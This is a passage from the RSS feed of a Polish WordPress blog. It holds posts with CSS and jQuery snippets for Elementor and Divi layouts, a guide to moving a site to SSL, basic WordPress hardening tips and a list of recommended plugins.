					<pre class='line-numbers theme-okaidia' data-show-toolbar='yes'><code class='language-javascript'>&lt;pre&gt;&lt;script&gt;&lt;![CDATA[ function goBack() { window.history.back() } // ]]&gt; 
&lt;/script&gt;&lt;/pre&gt;</code></pre>				</div>
				</div>
				<div class="elementor-element elementor-element-28cd5a8 elementor-widget elementor-widget-text-editor" data-id="28cd5a8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									A w miejscu gdzie ma wyświetlać się przycisk:
								</div>
				</div>
				<div class="elementor-element elementor-element-7ef9b9c elementor-widget elementor-widget-code-block-for-elementor" data-id="7ef9b9c" data-element_type="widget" data-e-type="widget" data-widget_type="code-block-for-elementor.default">
				<div class="elementor-widget-container">
					<pre class='line-numbers theme-okaidia' data-show-toolbar='yes'><code class='language-javascript'>&lt;pre&gt; &lt;button class=&quot;wroc&quot;&gt;Wr&oacute;ć&lt;/button&gt;
&lt;/pre&gt;</code></pre>				</div>
				</div>
				<div class="elementor-element elementor-element-d9eef61 elementor-widget elementor-widget-text-editor" data-id="d9eef61" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Następnie możesz przejść do edycji styłów css dla klasy .wroc i gotowe <img src="https://s.w.org/images/core/emoji/17.0.2/72x72/1f609.png" alt="😉" class="wp-smiley" style="height: 1em; max-height: 1em;" />								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/przycisk-wroc-w-wordpress/feed/</wfw:commentRss>
			<slash:comments>2</slash:comments>
		
		
			</item>
		<item>
		<title>Super funkcje Elementor za darmo</title>
		<link>https://sklep.kobietakoduje.pl/super-funkcje-elementor-za-darmo/</link>
					<comments>https://sklep.kobietakoduje.pl/super-funkcje-elementor-za-darmo/#respond</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Wed, 06 Jan 2021 16:38:03 +0000</pubDate>
				<category><![CDATA[Sklep internetowy]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<category><![CDATA[Wordpress]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=1001</guid>

					<description><![CDATA[<p>Tak! To możliwe! Może nie będziesz mieć wszystkich możliwych funkcji pro, ale możesz znacznie roszerzyć funkcjonalności podstawowego elementora. Jakie wtyczki należy doinstalować? Informacje znajdziesz poniżej:   Elementor Premium Addons for Elementor Essential Addons for Elementor Elementor – Header, Footer &#38; Blocks Template Make Column Clickable Elementor Image Hover Effects – Elementor Addon Chcesz utworzyć galerię [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="1001" class="elementor elementor-1001" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-513a6b9 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="513a6b9" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-86910d9" data-id="86910d9" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-c211082 elementor-widget elementor-widget-text-editor" data-id="c211082" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Tak! To możliwe! Może nie będziesz mieć wszystkich możliwych funkcji pro, ale możesz znacznie roszerzyć funkcjonalności podstawowego elementora. Jakie wtyczki należy doinstalować? Informacje znajdziesz poniżej:</p><p> </p>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				<section class="elementor-section elementor-top-section elementor-element elementor-element-cab0fd9 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="cab0fd9" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-4446e7d" data-id="4446e7d" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-148a153 elementor-widget elementor-widget-text-editor" data-id="148a153" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<ol><li style="list-style-type: none;"><ol><li><a href="https://pl.wordpress.org/plugins/elementor/" rel="nofollow ">Elementor</a></li><li><a href="https://pl.wordpress.org/plugins/premium-addons-for-elementor/" rel="nofollow ">Premium Addons for Elementor</a></li><li><a href="https://pl.wordpress.org/plugins/essential-addons-for-elementor-lite/" rel="nofollow ">Essential Addons for Elementor</a></li><li><a href="https://pl.wordpress.org/plugins/header-footer-elementor/" rel="nofollow ">Elementor – Header, Footer &amp; Blocks Template</a></li><li><a href="https://pl.wordpress.org/plugins/make-column-clickable-elementor/" rel="nofollow ">Make Column Clickable Elementor</a></li><li><a href="https://pl.wordpress.org/plugins/image-hover-effects-addon-for-elementor/" rel="nofollow ">Image Hover Effects – Elementor Addon</a></li></ol></li></ol>								</div>
				</div>
				<div class="elementor-element elementor-element-eb16f02 elementor-widget elementor-widget-text-editor" data-id="eb16f02" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>Chcesz utworzyć galerię typu masonry w elementor za darmo?</strong></p><p>Wystarczy, że do strony dodasz podstawową galerię, użyjesz 1 kolumny zdjęć, ustawić miniaturki na min. 300px i dodasz custom code do swojego pliku css lub w wygląd -&gt; dostosuj.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-a14bfa3 elementor-widget elementor-widget-code-block-for-elementor" data-id="a14bfa3" data-element_type="widget" data-e-type="widget" data-widget_type="code-block-for-elementor.default">
				<div class="elementor-widget-container">
					<pre class='line-numbers theme-okaidia' data-show-toolbar='yes'><code class='language-css'>.gallery-icon img{
    width: 100%;
}
@media (min-width: 1024px) {
    #gallery-1 {
      column-count: 4;
      column-gap: 0px;
    }
}
@media (min-width:361px) and (max-width:1024px) {
    #gallery-1 {
      column-count: 3;
      column-gap: 0px;      
    }  
}
@media (max-width:360px) {
    #gallery-1 {
      column-count: 3;
      column-gap: 0px;      
    }  
}</code></pre>				</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/super-funkcje-elementor-za-darmo/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Recepty  na divi</title>
		<link>https://sklep.kobietakoduje.pl/recepty-na-divi/</link>
					<comments>https://sklep.kobietakoduje.pl/recepty-na-divi/#respond</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Thu, 03 Oct 2019 14:07:13 +0000</pubDate>
				<category><![CDATA[Sklep internetowy]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=890</guid>

					<description><![CDATA[<p>Wielu początkujących blogerów korzysta z divi. Jest to dość fajne narzędzie do tworzenia stron internetowych i blogów bez znajomości programowania, czasem się jednak bez tego nie obejdzie. Poniżej zdradzę wam kilka odnośników do artykułów, które pomogą wam przebrnąć przez batalie błędów  divi i pomogą wam dostosować stronę do waszych wymagań. Jak zadbać o to aby [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="890" class="elementor elementor-890" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-a64fef4 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="a64fef4" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-01bed46" data-id="01bed46" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-81f6004 elementor-widget elementor-widget-text-editor" data-id="81f6004" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Wielu początkujących blogerów korzysta z divi. Jest to dość fajne narzędzie do tworzenia stron internetowych i blogów bez znajomości programowania, czasem się jednak bez tego nie obejdzie. Poniżej zdradzę wam kilka odnośników do artykułów, które pomogą wam przebrnąć przez batalie błędów  divi i pomogą wam dostosować stronę do waszych wymagań.</p><ol><li><strong>Jak zadbać o to aby artykuły na blogu miały taką samą wysokość zajawki?</strong><br />Na pewno nie raz zdarzyło wam się, że wysokości zajawek w jednym wierszu obejmującym np. trzy ostatnie wpisy blogowe były różne:</li></ol>								</div>
				</div>
				<div class="elementor-element elementor-element-7bd0002 elementor-widget elementor-widget-image" data-id="7bd0002" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="1024" height="512" src="https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog-1024x512.jpg" class="attachment-large size-large wp-image-892" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog-1024x512.jpg 1024w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog-300x150.jpg 300w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog-768x384.jpg 768w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog-1536x768.jpg 1536w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog-600x300.jpg 600w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/krzywo-blog.jpg 1920w" sizes="(max-width: 1024px) 100vw, 1024px" />															</div>
				</div>
				<div class="elementor-element elementor-element-e4077d2 elementor-widget elementor-widget-text-editor" data-id="e4077d2" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>I zapewne chcielibyście żeby wyglądały one w ten sposób:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-702de1d elementor-widget elementor-widget-image" data-id="702de1d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="1024" height="394" src="https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog-1024x394.jpg" class="attachment-large size-large wp-image-895" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog-1024x394.jpg 1024w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog-300x115.jpg 300w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog-768x295.jpg 768w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog-1536x590.jpg 1536w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog-600x231.jpg 600w, https://sklep.kobietakoduje.pl/wp-content/uploads/2019/10/rowno-blog.jpg 1920w" sizes="(max-width: 1024px) 100vw, 1024px" />															</div>
				</div>
				<div class="elementor-element elementor-element-8b90a72 elementor-widget elementor-widget-text-editor" data-id="8b90a72" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Wystarczy w zaawansowanych ustawieniach modułu blog dodać klasę css o nazwie &#8222;bloggrid&#8221;, a następnie dodać poniższy kod do custom style, możesz zrobić to w ustawieniach divi w zakładce &#8222;opcje szablonów graficznych&#8221;:
<pre><code>
/*Equalize Blog Columns*/
.bloggrid .et_pb_salvattore_content {
display: -webkit-box;
display: -ms-flexbox;
display: flex;
}

.bloggrid article {
margin-bottom: 20px !important;
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
display: -webkit-box;
display: -ms-flexbox;
display: flex;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
-ms-flex-direction: column;
flex-direction: column;
}

.bloggrid .post-content {
-webkit-box-flex: 1;
-ms-flex: 1 0 auto;
flex: 1 0 auto;
display: -webkit-box;
display: -ms-flexbox;
display: flex;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
-ms-flex-direction: column;
flex-direction: column;
-webkit-box-pack: justify;
-ms-flex-pack: justify;
justify-content: space-between;
}

.bloggrid .column {
margin-bottom: 20px !important;
display: -webkit-box;
display: -ms-flexbox;
display: flex;
-webkit-box-orient: vertical;
-webkit-box-direction: normal;
-ms-flex-direction: column;
flex-direction: column;
}
</pre></code>
Niestety recepta ta nie działa w blogach z 3-kolumnami, wtedy trzeba zastosować jquery. Co dokładnie trzeba zrobić?
Do modułu naszego bloga w ustawieniach zaawansowanych dodajemy nową klasę CSS "sensei-grid", a następnie dodajemy do skryptu w ustawieniach divi (integracje) poniższy kod javascript w klamerkach &lt; script&gt; i &lt;/ script&gt; (bez spacji):

<pre><code>
(function ($) {
$(document).ready(function () {

$( window ).resize(function() {
$(".sensei-grid").each(function(){
equalise_articles($(this));
});
});

$(".sensei-grid").each(function(){
var blog = $(this);
equalise_articles($(this));

var observer = new MutationObserver(function (mutations) {
equalise_articles(blog);
});

var config = { subtree: true, childList: true };
observer.observe(blog[0], config);
});

function equalise_articles(blog){
var articles = blog.find("article");

var heights = [];

articles.each(function(){
var height = 0;
//height += $(this).outerHeight() - $(this).height();
height += $(this).find(".et_pb_image_container").outerHeight(true);
height += $(this).find(".entry-title").outerHeight(true);
height += $(this).find(".post-meta").outerHeight(true);
height += $(this).find(".post-content").outerHeight(true);
heights.push(height);
});

var max_height = Math.max.apply(Math,heights);

articles.each(function(){
$(this).height(max_height);
});
}

$(document).ajaxComplete(function(){
$(".sensei-grid").imagesLoaded().then(function(){
console.log("images loaded");
$(".sensei-grid").each(function(){
equalise_articles($(this));
});
});
});

$.fn.imagesLoaded = function () {
var $imgs = this.find('img[src!=""]');
if (!$imgs.length) {return $.Deferred().resolve().promise();}
var dfds = [];
$imgs.each(function(){
var dfd = $.Deferred();
dfds.push(dfd);
var img = new Image();
img.onload = function(){dfd.resolve();}
img.onerror = function(){dfd.resolve();}
img.src = this.src;

});
return $.when.apply($,dfds);
}

});
})(jQuery);
</pre></code>
Cały artykuł na ten temat dostępny <a href="https://divi-sensei.com/blog/2018/03/07/divi-equalized-blog-grid-cards/" target="_blank" rel="noopener">tutaj</a>.								</div>
				</div>
				<div class="elementor-element elementor-element-53ca1c3 elementor-widget elementor-widget-text-editor" data-id="53ca1c3" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>2. Podobnie zapewne bywa z ustawieniem modułu produktów ze sklepu internetowego.<br /></strong>Chcesz dowiedzieć się jak zrobić aby produkty woocomerce były w jednej linii i sprawiały wrażenie wysokiej estetyki? Aby tego dokonać należy w pierwszym wierszu poprzedzającym moduł z produktami dodać klasę &#8222;<i>flex-row-wrapper&#8221;, a następnie dodać do custom code w ustawieniach divi poniższe parametry:</i></p><p><code>.flex-row-wrapper {<br />
 display: flex;<br />
}</code></p><p>.flex-row-wrapper .et_pb_column {<br />display: flex;<br />flex-direction: column;<br />padding: 20px;<br />justify-content: space-between;<br />}<br />@media screen and (max-width: 981px) {<br />.flex-row-wrapper {<br />flex-direction:column;<br />}<br />}</p>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/recepty-na-divi/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SSL i wdrożenie go na stronę z wordpress’em</title>
		<link>https://sklep.kobietakoduje.pl/ssl-i-wdrozenie-go-na-strone-z-wordpressem/</link>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Mon, 10 Jun 2019 08:50:08 +0000</pubDate>
				<category><![CDATA[Strona www]]></category>
		<guid isPermaLink="false">https://demo.themefreesia.com/cocktail/?p=560</guid>

					<description><![CDATA[<p>SSL to certyfikat bezpieczeństwa, który można uruchomić dla swojej domeny celem poświadczenia jej wiarygodności i bezpieczeństwa szyfrowania danych. Taki certyfikat powinien znaleźć się na każdej stronie gdzie użytkownicy podają swoje dane personalne: imię nazwisko, adres, email oraz tam gdzie są wszelkie płatności online. Wykupienie go i zainstalowanie go w swojej domenie nie jest niczym trudnym. Firma [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="560" class="elementor elementor-560" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-1980cd62 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1980cd62" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-1a64dc1e" data-id="1a64dc1e" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-629b7e8d elementor-widget elementor-widget-text-editor" data-id="629b7e8d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p><strong>SSL</strong> to certyfikat bezpieczeństwa, który można uruchomić dla swojej domeny celem poświadczenia jej wiarygodności i bezpieczeństwa szyfrowania danych. Taki certyfikat powinien znaleźć się na każdej stronie gdzie użytkownicy podają swoje dane personalne: imię nazwisko, adres, email oraz tam gdzie są wszelkie płatności online. Wykupienie go i zainstalowanie go w swojej domenie nie jest niczym trudnym. Firma hostingowa na pewno udzieli Ci wszelkich instrukcji jak się do tego zabrać. Problem pojawia się jeśli Twoja strona istnieje już na serwerze i po jakimś czasie wykupujesz ten o to certyfikat. Wszystkie adresy stron na Twoim serwisie dotąd miały przedrostek http :// teraz nastąpi zmiana na https://. W każdym linku, zdjęciu, stylu strony należy zmienić te adresy. Jest z tym trochę pracy, ale na szczęście są na to wygodne rozwiązania.</p><h2>Zaczynamy!</h2><p>Jeśli masz już wykupiony i zainstalowany certyfikat, należy zrobić kopię zapasową plików z serwera i bazy danych. Następnie możemy zalogować się do panelu wordpress’a i przejść do ustawień ogólnych i zmienić adres witryny z http://twojanazwa.pl na https://twojanazwa.pl tak jak w przykładzie poniżej:</p><p><img loading="lazy" decoding="async" src="https://kobietakoduje.pl/wp-content/uploads/2019/08/http.jpg" alt="https" width="556" height="228" /></p><p>To ustawienie spowoduje, że wszystkie adresy stworzonych przez Ciebie stron i postów zmienią adres na ten z przedrostkiem https:// ale nadal część adresów stron zagnieżdżonych w zdjęciach lub stylach mogły zostać z http:// w tym celu instalujemy wtyczkę <strong>Really Simple SSL </strong>oraz <strong>WP Migrate DB</strong>. Po zainstalowaniu obu wtyczek włączam pierwszą z nich i w ustawieniach wprowadzamy takie konfiguracje jak poniżej i zapisujemy:</p><p><img loading="lazy" decoding="async" src="https://kobietakoduje.pl/wp-content/uploads/2019/08/ssl-1024x580.jpg" alt="mixed content" width="759" height="430" /></p><p>Uzyskany efekt powinien być taki:</p><p><img loading="lazy" decoding="async" src="https://kobietakoduje.pl/wp-content/uploads/2019/08/ssl2-1024x232.jpg" alt="ssl" width="805" height="183" /></p><p>Jak widzimy w jednym miejscu mamy błąd, może to być spowodowane ciągle tym, że jeszcze gdzieś zostały za indeksowane linki z protokołem http:// , aby to zmienić włączamy <strong>WP Migrate DB</strong>. W menu wordpressa odnajdujemy Narzędzia -&gt; Migrate DB</p><p><img loading="lazy" decoding="async" src="https://kobietakoduje.pl/wp-content/uploads/2019/08/migrate-768x486.jpg" alt="migrate db" width="659" height="418" /></p><p>Teraz po wejściu na adres strony w nowej zakładce powinna wyświetlić się zielona kłódka przy adresie www, jeśli natomiast tak się nie dzieje, a nadal znajduje się tam taka informacja:</p><p><img loading="lazy" decoding="async" src="https://kobietakoduje.pl/wp-content/uploads/2019/08/niezabezpieczona.jpg" alt="niezabezpieczona" width="321" height="37" /></p><p>sygnalizuje to, że widocznie nadal jakiś z adresów nie został zmodernizowany. W takim wypadku polecamy skorzystać z narzędzi developerskich danej przeglądarki i sprawdzenie consoli z błędami. Zostanie tam wskazany najprawdopodobniej problem pt.: “The mixed content” oraz linijka w której dany protokół nie został podmieniony w adresie.</p><p>W przypadku jakichkolwiek problemów lub trudności w skonfigurowaniu certyfikatu SSL na swojej stronie prosimy o kontakt mailowy – nasz zespół służy wszelką pomocą oraz instrukcją.</p>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Jak dbać o swoją stronę www?</title>
		<link>https://sklep.kobietakoduje.pl/jak-dbac-o-swoja-strone-www/</link>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Mon, 03 Jun 2019 06:41:03 +0000</pubDate>
				<category><![CDATA[Strona www]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">https://demo.themefreesia.com/cocktail/?p=1</guid>

					<description><![CDATA[<p>W dobie dzisiejszego świata IT włamanie się na stronę www nie jest niczym trudnym. Dla wprawionych hakerów komputerowym wykradzenie hasła do Twojej strony nie stanowi większego problemu jeśli niedostatecznie dbasz o jej bezpieczeństwo. Dziś pokażę Ci kilka prostych zabiegów, które poprawią jakość zabezpieczeń w Twoim wordpressie. 1. Primo ultimo Zadbaj o jakość i różnorodność haseł do wszystkich kont [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="601" class="elementor elementor-601" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-3d7b7321 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3d7b7321" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c8df903" data-id="c8df903" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-549acbcf elementor-widget elementor-widget-text-editor" data-id="549acbcf" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>W dobie dzisiejszego świata IT włamanie się na stronę www nie jest niczym trudnym. Dla wprawionych hakerów komputerowym wykradzenie hasła do Twojej strony nie stanowi większego problemu jeśli niedostatecznie dbasz o jej bezpieczeństwo. Dziś pokażę Ci kilka prostych zabiegów, które poprawią jakość zabezpieczeń w Twoim wordpressie.</p><h2>1. Primo ultimo</h2><p>Zadbaj o jakość i różnorodność <strong>haseł</strong> do wszystkich kont online. Wybór tego samego hasła do większości kont, które używasz to stanowczo zła decyzja i czas ją zmienić! Nie dopuść do tego by Twoje konto email miało takie samo hasło jak jakiekolwiek inne Twoje konto np. hasło do <strong>wordpress’a lub facebook’a</strong>. Najlepsze hasła to te, które nie są zbyt krótkie, <strong>zawierają małe i duże litery, cyfry, a także znaki specjalne.</strong> <strong>Idealne hasło</strong> powinno mieć około <strong>20/30 znaków</strong>,warto również zainteresować się <strong>u2f</strong>, który można kupić lub skorzystać z gotowego narzędzia google &#8211; <strong>google authenticator</strong>. Ważnym zabiegiem jest również częstotliwość zmieniania hasła. Tak – hasło należy zmieniać co jakiś czas. Trudno określić konkretny okres, według mnie comiesięczna zmiana hasła, zapewnia dużo lepsze poczucie bezpieczeństwa. Pamiętaj też, aby nigdy nikomu nie podawać swojego hasła oraz aby nie korzystać z automatycznego generowania haseł – lepiej wymyślać własne, które są skomplikowane.</p><h2>2. Secondo – aktualizuj, aktualizuj, aktualizuj</h2><p>I jeszcze raz <strong>aktualizuj</strong>! Aby być gotowym na stanięcie oko w oko z atakiem hakerskim musisz mieć zaktualizowane oprogramowanie jakiego używasz. Zadbaj o to aby Twój wordpress był zawsze w najbardziej aktualnej wersji i jego wtyczki również. Musisz dbać aby wszystkie widgety jakich używasz były zawsze zaktualizowane. Pamiętaj jednak o tym, że jeśli wprowadzasz jakieś zmiany ręcznie w kodzie wtyczki (np. jej wygląd) zostaną one nadpisane przez aktualizację, tak więc nieodwracalnie je utracisz. Dlatego warto robić sobie notatki co i gdzie zmieniasz, a także mieć kopię zapasową tych zmian. Trzeba również wspomnieć, że jeśli nie używasz jakiś wtyczek bądź motywów na swoim wordpressie to warto je z niego usunąć. Wyłączenie wtyczki niestety nie załatwia sprawy – należy ją skasować.</p><h2>3. Login administratora</h2><p>Najczęściej używana nazwa użytkowników wordpressa? Odpowiedź brzmi – <strong>admin</strong>. Starajmy się nie używać tej nazwy, w ten sposób otwieramy pierwsze drzwi na atak naszej witryny, teraz dla hakera zostało wykraść lub rozszyfrować hasło i gotowe, będzie miał pewnie dostęp do Twojej poczty, facebook’a i konta bankowego jeżeli używasz tego samego hasła.</p><h2>4. Używaj certyfikatu SSL</h2><p>O certyfikatach SSL było już w poprzednim poście. Dodamy tylko, że nie musisz koniecznie używać płatnych rozwiązań, na rynku dostępne są również darmowe certyfikaty SSL, które również pomagają chronić się przed szkodliwym oprogramowaniem. Ważne jest natomiast aby ten certyfikat w ogóle posiadać.</p><h2>5.  Zainstaluj Disable <strong><a href="https://wordpress.org/plugins/disable-wp-rest-api/" target="_blank" rel="noopener nofollow">WP REST API</a></strong> widget</h2><p>Wtyczka ta odpowiada za wyłączenie WP REST API dla gości, którzy nie są zalogowani w WordPress. Nie wymaga żadnej dodatkowej konfiguracji, instalujesz, aktywujesz i gotowe! Pojawia się pewnie pytanie czymże jest to REST API, a wiec wyjaśniam: <strong>API</strong> &#8211; Interfejs programistyczny, który określa sposób komunikacji pomiędzy różnymi elementami programowania, natomiast <strong>REST</strong> to standard określający zasady projektowania API, tak wiem, że to wydaje się być skomplikowane dlatego dla bardziej zainteresowanych tematem polecam to <strong><a href="https://www.youtube.com/watch?v=P9b8-BrWdYs&amp;feature=youtu.be" target="_blank" rel="noopener nofollow">video</a></strong>. REST API może pobierać listę wszystkich aktywnych użytkowników naszej strony. Jeśli chcemy zabezpieczyć się przed tą i innymi kradzieżami lepiej zainstalować wtyczkę, która nam tą opcję wyłączy, gdyż włączona jest ona domyślnie w każdej aplikacji wordpress.</p><h3>6. Wyłącz listowania plików</h3><p>Częstym błędem jest nie wyłączenie listowania plików. Co to znaczy? To oznacza że po wpisaniu w pasek przeglądarki adresu twojanazwa.pl/wp-includes/ można zobaczyć zawartość Twoich plików i bez problemu je przechwycić. <strong>Jak wyłączyć listowanie?</strong> To proste! Wystarczy w pliku<strong> .htaccess</strong> dodać poniższy zapis: <strong>Options -Indexes</strong></p><h2>7. Zatrudnij inspektora</h2><p>Dodatkowo możesz zainstalować w swoim wordpressie taką wtyczkę jak <strong>Plugin Inspector</strong>. Jest to fajne rozwiązanie, które złoży Ci dokładny raport na temat zainstalowanych przez Ciebie wtyczek, a także poinformuje Cie czy są dla Ciebie bezpieczne.</p>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Najlepsze wtyczki wordpress</title>
		<link>https://sklep.kobietakoduje.pl/najlepsze-wtyczki-wordpress/</link>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Mon, 13 May 2019 15:43:49 +0000</pubDate>
				<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">http://localhost/wordpress/pixgraphy/?p=81</guid>

					<description><![CDATA[<p>Na początek Really Simple SSL &#8211; jeśli z jakiegoś powodu nie masz dostępu do pliku htaccess, teraz w łatwy sposób możesz aktywować certyfikat bezpieczeństwa na swojej stronie internetowej.  Edytor klasyczny &#8211; najnowsza wersja wordpressa wygląda nieco inaczej niż wcześniejsze, jeśli masz trudność z edycją zawartości strony polecam tę wtyczkę, sprawi że wszystko stanie się łatwiejsze. [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="81" class="elementor elementor-81" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-2a65a5d6 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="2a65a5d6" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-35626c71" data-id="35626c71" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-5b3f85cb elementor-widget elementor-widget-text-editor" data-id="5b3f85cb" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<strong>Na początek</strong>
<ol>
 	<li><strong><a href="https://pl.wordpress.org/plugins/really-simple-ssl/" target="_blank" rel="nofollow noopener">Really Simple SSL</a></strong> &#8211; jeśli z jakiegoś powodu nie masz dostępu do pliku htaccess, teraz w łatwy sposób możesz aktywować certyfikat bezpieczeństwa na swojej stronie internetowej.</li>
 	<li> <strong><a href="https://pl.wordpress.org/plugins/classic-editor/" target="_blank" rel="nofollow noopener">Edytor klasyczny</a></strong> &#8211; najnowsza wersja wordpressa wygląda nieco inaczej niż wcześniejsze, jeśli masz trudność z edycją zawartości strony polecam tę wtyczkę, sprawi że wszystko stanie się łatwiejsze.</li>
 	<li><a href="https://pl.wordpress.org/plugins/wp-super-cache/" target="_blank" rel="nofollow noopener"><strong>WP Super Cache</strong></a> &#8211; jeśli z jakiegoś powodu nie widać zmian na Twojej stronie mimo włączonego trybu incognito, być może jest to problem związany z odświeżaniem pamięci podręcznej. Wp super cache to znakomite narzędzie do jej usuwania.</li>
